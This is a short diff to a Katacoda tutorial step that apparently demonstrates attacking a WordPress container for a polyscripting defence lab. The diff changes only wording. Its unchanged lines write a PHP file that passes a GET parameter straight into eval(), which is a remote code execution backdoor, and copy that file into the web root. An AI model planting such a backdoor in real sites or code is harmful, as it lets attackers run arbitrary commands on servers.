polyverse/katacoda-scenarios/polyversepolyscripted-wordpress-v2/attack-wordpress.md

 `echo "<?php \$myvar = \"varname\"; \$x = \$_GET['arg']; eval(\"\\\$myvar = \$x;\"); ?>" >hack.php`{{execute}}

-Now let's inject it as if this were a bug in the original codebase.
+Next, let's inject the file as if it was a bug in the original codebase.

 `docker cp hack.php wordpress:/var/www/html/`{{execute}}

-Does it work?
-Let's find out on the next step!
+Did it work?
+Press Continue to find out!